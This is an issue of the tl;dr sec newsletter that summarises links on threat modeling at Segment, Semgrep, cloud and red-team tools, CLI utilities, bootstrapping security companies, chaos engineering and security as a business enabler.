• tl;dr sec
  • Posts
  • [tl;dr sec] #78 - Scaling Threat Modeling at Segment, Bootstrapping vs VCs, Security as Value Unlock

[tl;dr sec] #78 - Scaling Threat Modeling at Segment, Bootstrapping vs VCs, Security as Value Unlock

[tl;dr sec] #78 - Scaling Threat Modeling at Segment, Bootstrapping vs VCs

tl;dr sec is a newsletter about AppSec and scaling security, automated bug finding, conference talk and paper summaries, and useful links from around the web. You can subscribe here and see past issues here.

(You can also read this issue on our blog

)

Hey there,

I hope you’ve been doing well!

  Slogans that are not Security Companies but Should Be 

I was taking a walk recently and I saw some branding that made me do a double take- it was a plumbing company that had the perfect slogan for an infosec company. 

I walked up, took a picture, and then scurried strutted away when I realized that there were two people still sitting inside.

“Uhh… what are you doing?” one of them asked. “Oh, I just really like the design.” And then I meandered away, full of joy.

Sponsor

  📢 How the history of SaaS is preventing businesses from embracing modern SaaS security 

Businesses are investing more heavily in SaaS, but investment in SaaS security is lagging. Why? Much of the answer lies in the history of early SaaS applications, many of which were sold to individual business units, completely bypassing IT and security teams. Today, SaaS has grown to be a major part of the legitimate tech stack, but its origin as shadow IT still haunts organizations and prevents SaaS security from being correctly prioritized. AppOmni CEO Brendan O’Connor details four ways to modernize SaaS security processes. Originally published as a feature in SC Media.

📜 In this newsletter...

🔗 Links:

  • AppSec: How Segment is scaling threat modeling, Semgrep now has first-class YAML support

  • Web Security: Automating blind SQLi over websocket

  • Cloud Security: PMapper update, another IaC static analysis tool, HackerOne's first AWS CTF, attacking and auditing S3 buckets

  • Red Team: Free reverse engineering course, intercepting mTLS of Java thick clients, tool for macOS persistence

  • Neat CLI tools: Find files with SQL-like queries, exa, a better ls, problems you can solve with strace

  • Bootstrapping vs VCs: Thinkst has bootstrapped to $11M ARR, a story of a bootstrapped company trying to compete with a VC-backed one, DHH weighs in, Hamilton parody of the situation

  • Chaos Engineering: What computer security can learn from safety and complex systems research in other fields

  • Security as Value Unlocker: Minimizing risk is setting your sights too low, security can unlock significant business value

AppSec

Redefining Threat Modeling: Security team goes on vacationGreat post by Segment’s Jeevan Saini. Similar to what Jacob Salassi and I discussed in our blog post, Segment realized they needed developers to lead threat modeling if they were truly going to scale. This post gives a nice overview of the problem space and details on how they actually rolled out their program, and they’ve open sourced their threat modeling training slides. As the kids say these days- yeet!

How we made Semgrep rules run on Semgrep rulesBy r2c’s Emma Jin: Semgrep now has first-class support for anything YAML, which includes Kubernetes configs, CircleCI workflows, and more. You can even lint Semgrep rules with… more Semgrep rules! (yo dawg, I heard you like… 🤣). The post also has some neat info about implementation details, if you’re curious to get a peak at Semgrep internals.

Web Security

Automating Blind SQL injection over WebSocketBlog post by Rayhan Ahmed, and he’s released a vulnerable NodeJS web app that you can practice on. 

Cloud Security

Principal Mapper v1.1.0 UpdateBy NCC Group’s Erik Steringer: PMapper, an IAM permission analysis tool, now supports AWS Organizations as well as other types of policies: Service Control Policies (SCPs), Session Policies, Resource Policies, and Permission Boundaries. 

Checkmarx/kicsA static analysis tool that can find security vulnerabilities, compliance issues, and misconfigurations in infrastructure as code. Currently supports: Terraform, Kubernetes, Docker, CloudFormation, Ansible, Helm. 

AWS and Hackerone CTF“Put your cloud skills to the test and participate in HackerOne’s first-ever AWS Capture the Flag on Monday, April 5th starting at 12:00 PM PT until Monday, April 12th 12:00 PM PT.” Learn how to escalate privileges through SSRF and elevate your access by exploiting misconfigurations of AWS services. 

Cloud Storage Security: Attacking & AuditingPayatu’s Vitthal Shinde describes a number of ways to enumerate S3 buckets and how to look for misconfigurations, including Google/GitHub dorking, bruteforce, certificate transparency logs, JavaScript, CNAMEs, and directory listing.

  Red Team 

mytechnotalent/Reverse-EngineeringA free comprehensive reverse engineering course covering x86, x64, 32-bit ARM & 64-bit ARM architectures by Kevin Thomas

HowTo: intercept mutually-authenticated TLS communications of a Java thick clientNice walkthrough by @SAERXCIT, which involves: dumping the password from the client to decrypt the private key from the ClientKeyStore and loading a fake TrustStore in place of the legitimate ClientTrustStore to bypass pinning. See also Piergiovanni Cipolloni ’s SSL pinning bypass in Android using Frida

CyborgSecurity/PoisonAppleBy Cyborg Security’s Austin Jackson: A CLI tool to perform various persistence mechanism techniques on macOS, designed to be used by threat hunters for cyber threat emulation purposes. Currently includes ~16 persistence mechanisms, including LaunchAgent, LoginHook, and more.

  Neat CLI Tools 

jhspetersson/fselectFind files with SQL-like queries.

Why I use exa instead of ls on Linuxexa improves on ls with more features and better defaults. It uses colors to distinguish file types and metadata, and it knows about symlinks, extended attributes, and Git. 

What problems do people solve with strace?If you haven’t already heard of her work, Julia Evans writes great content (and fun Zines) about various tech tools and concepts, highly recommended. People use strace to answer: where’s a program’s config file, what other files does a program depend on, determine why it’s hanging, stuck, or slow, diagnosing hidden permission errors, determining what CLI arguments are being used, why network connections are failing, and more.

  Bootstrapping vs VCs 

We bootstrapped to $11 million in ARRInspiring blog post by Haroon Meer about how Thinkst grew to $11M ARR with no external funding by focusing on solving customer problems, keeping promises, and great company culture. If you’re not familiar, Thinkst is one of the few security companies that users rave about, and Haroon is such a kind, humble, A+ dude. I couldn’t be happier for their success. Check this post for some great tips on culture, values, and also some trade-offs of not raising money. See also Haroon’s response to 👇 

It’s hard to draw lessons from your own failuresBy @DHH: “Wilkinson was inspired by our funding model – bootstrapped from consulting – but didn’t follow any of the principles that go with that model.” 

Also, Martin Jambon shared this gem:

  Chaos Engineering 

Security Chaos Engineering: How to Security DifferentlyVerica’s Aaron Rinehart discusses computer security in relation to resiliency and robustness in other domains with complex systems. He includes a few references to other non-security domain work on complex systems, minimizing human error, and safety. There’s a few high level ideas that I thought were pretty interesting:

  • Traditionally security focuses on counting security negatives: unpatched software, security log events, bugs, etc.

  • Instead, we should focus on security positives: capabilities that help keep systems in secure states, help us understand what’s going on, and prevent bad events.

  • Focus on adaptive capacity— the ability to respond, monitor, learn, and anticipate errors.

  • One common fallacy is we assume that when we wrote the policy, designed the system, and implemented the relevant security measures that we had an accurate understanding of how the entire system behaved to begin with.

  Security as Value Unlocker 

A few weeks ago I had the privilege of presenting some of my colleagues and my work on secure defaults and eliminating vulnerability classes at the Bay Area CSO Council (thanks Flee!).

There were some other great presentations and interesting free-form discussions, but one of my favorite parts was a comment by Adrian Ludwig (currently CISO at Atlassian, formerly Director of Android Security at Google), right at the end.

The following is my paraphrased version, sharing with Adrian’s permission:

Having your security team focus on minimizing risk is setting your sights too low. The goal of a security org should be to facilitate the types of experiences that weren’t possible until we had achieved that level of risk mitigation.

When I lead Android security at Google, we had an incredibly high security bar. Why? We were building an OS, a platform upon which billion dollar companies like Uber were being built. If we built a fundamentally insecure platform, all of these companies building on top of us would fail. Framing it this way caused us to view Android security very differently internally, and helped drive conversations with development teams and product.

The security of the platform you’re building unlocks business potential. This fundamentally changes the conversation with the business- it’s not about minimizing downside, it’s about unlocking upside.

Historically, different product groups and parts of the business meet at the table and come with the promise of “unlocking upside” and “unlimited potential,” while security shows up talking about “minimizing downside.” That’s why security hasn’t had a seat at the table. But no longer - building secure platforms can unlock massive business upside.

Thanks for reading!

Cheers,

Clint